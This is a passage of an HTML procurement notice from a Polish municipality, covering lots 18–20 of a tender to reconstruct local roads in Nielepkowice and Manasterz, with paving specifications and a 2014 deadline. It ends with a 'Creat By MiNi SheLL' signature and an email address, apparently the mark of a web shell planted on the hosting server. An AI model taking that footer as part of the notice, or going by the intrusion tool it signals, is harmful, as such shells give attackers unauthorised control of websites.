-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,    nr  ew. dz. 370, 
                        w km. 0+000 - 0+285.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,    nr  ew. dz. 370, 
                        w km. 0+000 - 0+285 
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Manasterzu,     nr  ew. dz. 494, 
                        w km. 0+000 - 0+240.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Manasterzu,     nr  ew. dz. 494, 
                        w km. 0+000 - 0+240 
-	oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12 warstwa  gr.2cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,  nr  ew. dz. 206, 
                        w km. 0+000 - 0+130.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,  nr  ew. dz. 206, 
                        w km. 0+000 - 0+130 
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość warstwy 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	Uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com